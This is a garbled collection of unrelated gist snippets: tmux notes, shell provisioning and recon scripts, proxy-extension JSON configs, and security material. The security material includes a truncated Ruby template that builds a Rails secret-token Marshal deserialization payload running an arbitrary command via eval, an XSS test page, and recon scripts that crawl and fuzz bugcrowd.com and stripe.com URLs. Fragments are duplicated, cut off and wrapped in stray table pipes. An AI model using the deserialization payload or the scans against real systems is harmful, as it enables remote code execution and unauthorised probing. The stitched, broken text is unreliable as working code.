As configured in my dotfiles.
start new:
tmux
start new with session name:
tmux new -s myname
#!/bin/bash
# Refresh the apt package index and purge any previously installed Docker
# packages. Intended for unattended provisioning, so every apt-get call
# must run without prompting.
set -euo pipefail

export DEBIAN_FRONTEND="noninteractive"

# update apt-get
sudo apt-get update

# Remove previously installed Docker.
# -y is required: under a non-interactive frontend an unconfirmed purge
# would hang or abort. The globs are quoted so the shell cannot expand
# them against files in the current directory before apt sees them.
# `|| true`: the packages may simply not be installed, which is fine.
sudo apt-get purge -y 'lxc-docker*' || true
sudo apt-get purge -y 'docker.io*' || true
#!/usr/bin/env bash
# Build top-1000.txt: the 1,000 highest-ranked domains from the Alexa
# top-1M list. CSV rows are "rank,domain"; we keep the domain column.
# NOTE(review): the Alexa static list has been retired; this URL may now
# 404 — TODO confirm and consider a maintained replacement (e.g. Tranco).
set -euo pipefail

# Fetch over HTTPS — the original used plain HTTP for a list that feeds
# security tooling, which invites tampering in transit.
wget -q https://s3.amazonaws.com/alexa-static/top-1m.csv.zip
unzip -o top-1m.csv.zip

# Take the second field of the first 1000 rows. Exiting awk at row 1000
# (instead of the original `awk | head -1000`) avoids scanning the full
# million-line file and avoids a SIGPIPE failure under pipefail.
awk -F ',' 'NR <= 1000 { print $2 } NR == 1000 { exit }' top-1m.csv > top-1000.txt

# Clean up both the zip and the extracted CSV (top-1000.txt does not match).
rm -f top-1m.csv*
As configured in my dotfiles.
start new:
tmux
start new with session name:
tmux new -s myname
| #THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others | |
| require 'base64' | |
| require 'openssl' | |
| require 'optparse' | |
| require 'open-uri' | |
| SECRET_TOKEN = "SECRET HERE" | |
| code = "eval('`COMMAND HERE`')" | |
| marshal_payload = Base64.encode64( | |
| "\x04\x08" + | |
| "o" + |
<!-- Minimal XSS playground: a javascript: link that fires on click, and a
     broken image whose onerror handler fires immediately on page load. -->
<html>
  <head></head>
  <body>
    <a id="link" href="javascript: alert('clicked xss link')">click me</a>
    <img src="xx" onerror="alert('xss')" />
  </body>
</html>
| google dork -> site:.co.uk inurl:"responsible disclosure" | |
| https://registry.internetnz.nz/about/vulnerability-disclosure-policy/ | |
| http://www.123contactform.com/security-acknowledgements.htm | |
| https://18f.gsa.gov/vulnerability-disclosure-policy/ | |
| https://support.1password.com/security-assessments/ | |
| https://www.23andme.com/security-report/ | |
| https://www.abnamro.com/en/footer/responsible-disclosure.html | |
| https://www.accenture.com/us-en/company-accenture-responsible-disclosure | |
| https://www.accredible.com/white_hat/ | |
| https://www.acquia.com/how-report-security-issue |
#!/usr/bin/env bash
# Passively collect archived URLs for *.bugcrowd.com from the Wayback
# Machine CDX index, drop static assets, and rewrite each URL's query
# string into a FUZZ-able template. Output file names are kept exactly as
# the original produced them (including the "URLParamter" typo) so
# downstream tooling keeps working.
set -euo pipefail

readonly CDX_API='http://web.archive.org/cdx/search/cdx?url=*.bugcrowd.com/*&output=text&fl=original&collapse=urlkey'

# Rewrite one URL: insert "=FUZZ&" at every '=' and '&', then force the
# final '='-separated field to FUZZ as well — the same transform as the
# original one-liner, minus its bugs (word-splitting via `for i in
# $(cat ...)`, glob expansion of URLs containing '*' or '?' during the
# unquoted array assignment, and the unquoted ${LIST} echo).
fuzz_url() {
  local rewritten=${1//[=&]/=FUZZ&}
  printf '%s\n' "$rewritten" | awk -F'=' -v OFS='=' '{ $NF = "FUZZ" } 1'
}

# Keep only URLs carrying a query string, delete lines mentioning static
# asset extensions, then fuzz each surviving URL. Writing with '>' (the
# original appended with '>>') stops the intermediate file growing
# without bound across runs; no Output.txt temp file is needed.
curl -s "$CDX_API" \
  | grep -F '=' \
  | sed '/\b\(jpg\|png\|js\|svg\|css\|gif\|jpeg\|woff\|woff2\)\b/d' \
  | while IFS= read -r url; do
      fuzz_url "$url"
    done > Passive_Collecting_URLParamter.txt

sort -u Passive_Collecting_URLParamter.txt > Passive_Collecting_URLParamter_Uniq.txt
| { | |
| "30523382": { | |
| "className": "Proxy", | |
| "data": { | |
| "bypassFPForPAC": true, | |
| "color": "#f57575", | |
| "configUrl": "", | |
| "credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=", | |
| "cycle": false, | |
| "enabled": true, |
| { | |
| "84kr3q1592995213323": { | |
| "type": 1, | |
| "color": "#cc883a", | |
| "title": "Burp", | |
| "active": true, | |
| "address": "127.0.0.1", | |
| "port": 8080, | |
| "proxyDNS": false, | |
| "username": "", |
#!/usr/bin/env bash
# Crawl an API-docs site with hakrawler, run the nuclei link-finder
# template over the discovered pages, then split the findings into a
# parameter wordlist and a relative-links wordlist.
set -euo pipefail

# BUG FIX: the original saved the template under its gist name
# (api-linkfinder.yaml) but ran nuclei against ./linkfinder.yaml, so the
# template was never found. -O pins the filename nuclei actually uses.
wget -q -O linkfinder.yaml \
  'https://gist.githubusercontent.com/nullenc0de/bb16be959686295b3b1caff519cc3e05/raw/2016dc0e692821ec045edd5ae5c0aba5ec9ec3f1/api-linkfinder.yaml'

printf '%s\n' 'https://stripe.com/docs/api' \
  | hakrawler -t 500 -d 10 \
  | nuclei -t ./linkfinder.yaml -o api.txt

# Extract one finding class from nuclei's output: grab field 7, break
# bracketed comma-separated lists onto their own lines, strip quoting,
# and de-duplicate. Replaces the two near-identical cat|grep pipelines.
extract_findings() {
  grep -- "$1" api.txt \
    | cut -d ' ' -f 7 \
    | tr ',][' '\n\n\n' \
    | tr -d '"' \
    | tr -d "'" \
    | sort -u
}

extract_findings url_params     > api_params.txt
extract_findings relative_links > api_link_finder.txt